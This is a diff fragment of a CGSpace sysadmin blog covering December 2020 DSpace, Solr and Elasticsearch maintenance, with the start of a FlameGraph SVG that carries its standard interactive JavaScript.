+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
+</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
+</span></span><span style="display:flex;"><span>Changes have been processed
+</span></span><span style="display:flex;"><span>Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
+</span></span><span style="display:flex;"><span>           Exception: null
+</span></span><span style="display:flex;"><span>java.lang.NullPointerException
+</span></span><span style="display:flex;"><span>        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
+</span></span><span style="display:flex;"><span>        at com.google.common.collect.Iterators.concat(Iterators.java:464)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>I did it via CSV with <code>fix-metadata-values.py</code> instead:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2020-12-17-update-ILRI-author.csv
+</span></span><span style="display:flex;"><span>dc.contributor.author,correct
+</span></span><span style="display:flex;"><span>&#34;Padmakumar, V.P.&#34;,&#34;Varijakshapanicker, Padmakumar&#34;
+</span></span><span style="display:flex;"><span>$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
+</span></span></code></pre></div><ul>
+<li>Abenet needed a list of all 2020 outputs from the Livestock CRP that were Limited Access
+<ul>
+<li>I exported the community from CGSpace and used <code>csvcut</code> and <code>csvgrep</code> to get a list:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c &#39;dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]&#39; ~/Downloads/10568-80099.csv | csvgrep -c &#39;cg.identifier.status[en_US]&#39; -m &#39;Limited Access&#39; | csvgrep -c &#39;dc.date.issued&#39; -m 2020 -c &#39;dc.date.issued[]&#39; -m 2020 -c &#39;dc.date.issued[en_US]&#39; -m 2020 &gt; /tmp/limited-2020.csv
+</code></pre><h2 id="2020-12-18">2020-12-18</h2>
+<ul>
+<li>I added support for indexing community views and downloads to <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a>
+<ul>
+<li>I still have to add the API endpoints to make the stats available</li>
+<li>Also, I played a little bit with Swagger via <a href="https://github.com/rdidyk/falcon-swagger-ui">falcon-swagger-ui</a> and I think I can get that working for better API documentation / testing</li>
+</ul>
+</li>
+<li>Atmire sent some feedback on the DeduplicateValuesProcessor
+<ul>
+<li>They confirm that it should process <em>all</em> duplicates, not just those in <code>owningComm</code> and <code>owningColl</code></li>
+<li>They asked me to try it again on DSpace Test now that I&rsquo;ve resync&rsquo;d the Solr statistics cores from production</li>
+<li>I started processing the statistics core on DSpace Test</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-12-20">2020-12-20</h2>
+<ul>
+<li>The DeduplicateValuesProcessor has been running on DSpace Test since two days ago and it almost completed its second twelve-hour run, but crashed near the end:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
+</span></span><span style="display:flex;"><span>Exception: Java heap space
+</span></span><span style="display:flex;"><span>java.lang.OutOfMemoryError: Java heap space
+</span></span><span style="display:flex;"><span>        at java.util.Arrays.copyOfRange(Arrays.java:3664)
+</span></span><span style="display:flex;"><span>        at java.lang.String.&lt;init&gt;(String.java:207)
+</span></span><span style="display:flex;"><span>        at org.noggit.CharArr.toString(CharArr.java:164)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
+</span></span><span style="display:flex;"><span>        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
+</span></span><span style="display:flex;"><span>        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
+</span></span><span style="display:flex;"><span>        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+</span></span><span style="display:flex;"><span>        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>That was with a JVM heap of 512m</li>
+<li>I looked in Solr and found dozens of duplicates of each field again&hellip;
+<ul>
+<li>I sent <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">feedback to Atmire</a></li>
+</ul>
+</li>
+<li>I finished the technical work on adding community and collection support to the DSpace Statistics API
+<ul>
+<li>I still need to update <del>the tests</del> as well as the documentation</li>
+</ul>
+</li>
+<li>I started a harvesting of AReS</li>
+</ul>
+<h2 id="2020-12-21">2020-12-21</h2>
+<ul>
+<li>The AReS harvest finished this morning and I moved the Elasticsearch index manually</li>
+<li>First, check the number of records in the temp index to make sure it seems complete and not with double data:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100135,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Then delete the old backup and clone the current items index as a backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14?pretty&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
+</span></span></code></pre></div><ul>
+<li>Then delete the current items index and clone it from temp:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><h2 id="2020-12-22">2020-12-22</h2>
+<ul>
+<li>I finished getting the Swagger UI integrated into the dspace-statistics-api
+<ul>
+<li>I can&rsquo;t figure out how to get it to work on the server without hard-coding all the paths</li>
+<li>Falcon is smart about its own routes, so I can retrieve the <code>openapi.json</code> file OK, but the paths in the OpenAPI schema are relative to the base URL, which is <code>dspacetest.cgiar.org</code></li>
+</ul>
+</li>
+<li>Abenet told me about a bug with shared links and strange values in the top counters
+<ul>
+<li>I took a video reproducing the issue and filed a bug on the GitHub: <a href="https://github.com/ilri/OpenRXV/issues/66">https://github.com/ilri/OpenRXV/issues/66</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-12-23">2020-12-23</h2>
+<ul>
+<li>Finalize Swagger UI support in the dspace-statistics-api
+<ul>
+<li>I had to do some last minute changes to get it to work in both production and local development environments</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-12-27">2020-12-27</h2>
+<ul>
+<li>More finishing touches on paging and versioning of the dspace-statistics-api
+<ul>
+<li>I tagged v1.4.0 and released it on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.0</a></li>
+<li>I deployed it on DSpace Test and CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-12-28">2020-12-28</h2>
+<ul>
+<li>Peter noticed that the Atmire CUA stats on CGSpace weren&rsquo;t working
+<ul>
+<li>I looked in Solr Admin UI and saw that the statistics-2012 core failed to load:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>statistics-2012: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
+</code></pre><ul>
+<li>I exported the 2012 stats from the year core and imported them to the main statistics core with solr-import-export-json:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><ul>
+<li>I decided to do the same for the remaining 2011, 2014, 2017, and 2019 cores&hellip;</li>
+</ul>
+<h2 id="2020-12-29">2020-12-29</h2>
+<ul>
+<li>Start a fresh re-index on AReS, since it&rsquo;s been over a week since the last time
+<ul>
+<li>Before then I cleared the old <code>openrxv-items-temp</code> index and made a backup of the current <code>openrxv-items</code> index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100135,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><h2 id="2020-12-30">2020-12-30</h2>
+<ul>
+<li>The indexing on AReS finished so I cloned the <code>openrxv-items-temp</code> index to <code>openrxv-items</code> and deleted the backup index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-29?pretty&#39;</span>
+</span></span></code></pre></div><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020/02/cgspace-stats-after.png b/docs/2020/02/cgspace-stats-after.png
new file mode 100644
index 000000000..850527067
Binary files /dev/null and b/docs/2020/02/cgspace-stats-after.png differ
diff --git a/docs/2020/02/cgspace-stats-before.png b/docs/2020/02/cgspace-stats-before.png
new file mode 100644
index 000000000..dc0caac85
Binary files /dev/null and b/docs/2020/02/cgspace-stats-before.png differ
diff --git a/docs/2020/02/cgspace-stats-years.png b/docs/2020/02/cgspace-stats-years.png
new file mode 100644
index 000000000..3216d4a4e
Binary files /dev/null and b/docs/2020/02/cgspace-stats-years.png differ
diff --git a/docs/2020/02/flamegraph-java-cli-dspace58.svg b/docs/2020/02/flamegraph-java-cli-dspace58.svg
new file mode 100644
index 000000000..75ed8cd58
--- /dev/null
+++ b/docs/2020/02/flamegraph-java-cli-dspace58.svg
@@ -0,0 +1,4200 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" width="1200" height="886" onload="init(evt)" viewBox="0 0 1200 886" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+<!-- Flame graph stack visualization. See https://github.com/brendangregg/FlameGraph for latest version, and http://www.brendangregg.com/flamegraphs.html for examples. -->
+<!-- NOTES:  -->
+<defs>
+	<linearGradient id="background" y1="0" y2="1" x1="0" x2="0" >
+		<stop stop-color="#eeeeee" offset="5%" />
+		<stop stop-color="#eeeeb0" offset="95%" />
+	</linearGradient>
+</defs>
+<style type="text/css">
+	text { font-family:Verdana; font-size:12px; fill:rgb(0,0,0); }
+	#search, #ignorecase { opacity:0.1; cursor:pointer; }
+	#search:hover, #search.show, #ignorecase:hover, #ignorecase.show { opacity:1; }
+	#subtitle { text-anchor:middle; font-color:rgb(160,160,160); }
+	#title { text-anchor:middle; font-size:17px}
+	#unzoom { cursor:pointer; }
+	#frames > *:hover { stroke:black; stroke-width:0.5; cursor:pointer; }
+	.hide { display:none; }
+	.parent { opacity:0.5; }
+</style>
+<script type="text/ecmascript">
+<![CDATA[
+	"use strict";
+	var details, searchbtn, unzoombtn, matchedtxt, svg, searching, currentSearchTerm, ignorecase, ignorecaseBtn;
+	function init(evt) {
+		details = document.getElementById("details").firstChild;
+		searchbtn = document.getElementById("search");
+		ignorecaseBtn = document.getElementById("ignorecase");
+		unzoombtn = document.getElementById("unzoom");
+		matchedtxt = document.getElementById("matched");
+		svg = document.getElementsByTagName("svg")[0];
+		searching = 0;
+		currentSearchTerm = null;
+	}
+
+	window.addEventListener("click", function(e) {
+		var target = find_group(e.target);
+		if (target) {
+			if (target.nodeName == "a") {
+				if (e.ctrlKey === false) return;
+				e.preventDefault();
+			}
+			if (target.classList.contains("parent")) unzoom();
+			zoom(target);
+		}
+		else if (e.target.id == "unzoom") unzoom();
+		else if (e.target.id == "search") search_prompt();
+		else if (e.target.id == "ignorecase") toggle_ignorecase();
+	}, false)
+
+	// mouse-over for info
+	// show
+	window.addEventListener("mouseover", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = "Function: " + g_to_text(target);
+	}, false)
+
+	// clear
+	window.addEventListener("mouseout", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = ' ';
+	}, false)
+
+	// ctrl-F for search
+	window.addEventListener("keydown",function (e) {
+		if (e.keyCode === 114 || (e.ctrlKey && e.keyCode === 70)) {
+			e.preventDefault();
+			search_prompt();
+		}
+	}, false)
+
+	// ctrl-I to toggle case-sensitive search
+	window.addEventListener("keydown",function (e) {
+		if (e.ctrlKey && e.keyCode === 73) {
+			e.preventDefault();
+			toggle_ignorecase();
+		}
+	}, false)
+
+	// functions
+	function find_child(node, selector) {
+		var children = node.querySelectorAll(selector);
+		if (children.length) return children[0];
+		return;
+	}
+	function find_group(node) {
+		var parent = node.parentElement;
+		if (!parent) return;
+		if (parent.id == "frames") return node;
+		return find_group(parent);
+	}
+	function orig_save(e, attr, val) {
+		if (e.attributes["_orig_" + attr] != undefined) return;
+		if (e.attributes[attr] == undefined) return;
+		if (val == undefined) val = e.attributes[attr].value;
+		e.setAttribute("_orig_" + attr, val);
+	}
+	function orig_load(e, attr) {
+		if (e.attributes["_orig_"+attr] == undefined) return;
+		e.attributes[attr].value = e.attributes["_orig_" + attr].value;
+		e.removeAttribute("_orig_"+attr);
+	}
+	function g_to_text(e) {
+		var text = find_child(e, "title").firstChild.nodeValue;
+		return (text)
+	}
+	function g_to_func(e) {
+		var func = g_to_text(e);
+		// if there's any manipulation we want to do to the function
+		// name before it's searched, do it here before returning.
+		return (func);
+	}
+	function update_text(e) {
+		var r = find_child(e, "rect");
+		var t = find_child(e, "text");
+		var w = parseFloat(r.attributes.width.value) -3;
+		var txt = find_child(e, "title").textContent.replace(/\([^(]*\)$/,"");
+		t.attributes.x.value = parseFloat(r.attributes.x.value) + 3;
+
+		// Smaller than this size won't fit anything
+		if (w < 2 * 12 * 0.59) {
+			t.textContent = "";
+			return;
+		}
+
+		t.textContent = txt;
+		// Fit in full text width
+		if (/^ *$/.test(txt) || t.getSubStringLength(0, txt.length) < w)
+			return;
+
+		for (var x = txt.length - 2; x > 0; x--) {
+			if (t.getSubStringLength(0, x + 2) <= w) {
+				t.textContent = txt.substring(0, x) + "..";
+				return;
+			}
+		}
+		t.textContent = "";
+	}
+
+	// zoom
+	function zoom_reset(e) {
+		if (e.attributes != undefined) {
+			orig_load(e, "x");
+			orig_load(e, "width");
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_reset(c[i]);
+		}
+	}
+	function zoom_child(e, x, ratio) {
+		if (e.attributes != undefined) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = (parseFloat(e.attributes.x.value) - x - 10) * ratio + 10;
+				if (e.tagName == "text")
+					e.attributes.x.value = find_child(e.parentNode, "rect[x]").attributes.x.value + 3;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseFloat(e.attributes.width.value) * ratio;
+			}
+		}
+
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_child(c[i], x - 10, ratio);
+		}
+	}
+	function zoom_parent(e) {
+		if (e.attributes) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = 10;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseInt(svg.width.baseVal.value) - (10 * 2);
+			}
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_parent(c[i]);
+		}
+	}
+	function zoom(node) {
+		var attr = find_child(node, "rect").attributes;
+		var width = parseFloat(attr.width.value);
+		var xmin = parseFloat(attr.x.value);
+		var xmax = parseFloat(xmin + width);
+		var ymin = parseFloat(attr.y.value);
+		var ratio = (svg.width.baseVal.value - 2 * 10) / width;
+
+		// XXX: Workaround for JavaScript float issues (fix me)
+		var fudge = 0.0001;
+
+		unzoombtn.classList.remove("hide");
+
+		var el = document.getElementById("frames").children;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var a = find_child(e, "rect").attributes;
+			var ex = parseFloat(a.x.value);
+			var ew = parseFloat(a.width.value);
+			var upstack;
+			// Is it an ancestor
+			if (0 == 0) {
+				upstack = parseFloat(a.y.value) > ymin;
+			} else {
+				upstack = parseFloat(a.y.value) < ymin;
+			}
+			if (upstack) {
+				// Direct ancestor
+				if (ex <= xmin && (ex+ew+fudge) >= xmax) {
+					e.classList.add("parent");
+					zoom_parent(e);
+					update_text(e);
+				}
+				// not in current path
+				else
+					e.classList.add("hide");
+			}
+			// Children maybe
+			else {
+				// no common path
+				if (ex < xmin || ex + fudge >= xmax) {
+					e.classList.add("hide");
+				}
+				else {
+					zoom_child(e, xmin, ratio);
+					update_text(e);
+				}
+			}
+		}
+		search();
+	}
+	function unzoom() {
+		unzoombtn.classList.add("hide");
+		var el = document.getElementById("frames").children;
+		for(var i = 0; i < el.length; i++) {
+			el[i].classList.remove("parent");
+			el[i].classList.remove("hide");
+			zoom_reset(el[i]);
+			update_text(el[i]);
+		}
+		search();
+	}
+
+	// search
+	function toggle_ignorecase() {
+		ignorecase = !ignorecase;
+		if (ignorecase) {
+			ignorecaseBtn.classList.add("show");
+		} else {
+			ignorecaseBtn.classList.remove("show");
+		}
+		reset_search();
+		search();
+	}
+	function reset_search() {
+		var el = document.querySelectorAll("#frames rect");
+		for (var i = 0; i < el.length; i++) {
+			orig_load(el[i], "fill")
+		}
+	}
+	function search_prompt() {
+		if (!searching) {
+			var term = prompt("Enter a search term (regexp " +
+			    "allowed, eg: ^ext4_)"
+			    + (ignorecase ? ", ignoring case" : "")
+			    + "\nPress Ctrl-i to toggle case sensitivity", "");
+			if (term != null) {
+				currentSearchTerm = term;
+				search();
+			}
+		} else {
+			reset_search();
+			searching = 0;
+			currentSearchTerm = null;
+			searchbtn.classList.remove("show");
+			searchbtn.firstChild.nodeValue = "Search"
+			matchedtxt.classList.add("hide");
+			matchedtxt.firstChild.nodeValue = ""
+		}
+	}
+	function search(term) {
+		if (currentSearchTerm === null) return;
+		var term = currentSearchTerm;
+
+		var re = new RegExp(term, ignorecase ? 'i' : '');
+		var el = document.getElementById("frames").children;
+		var matches = new Object();
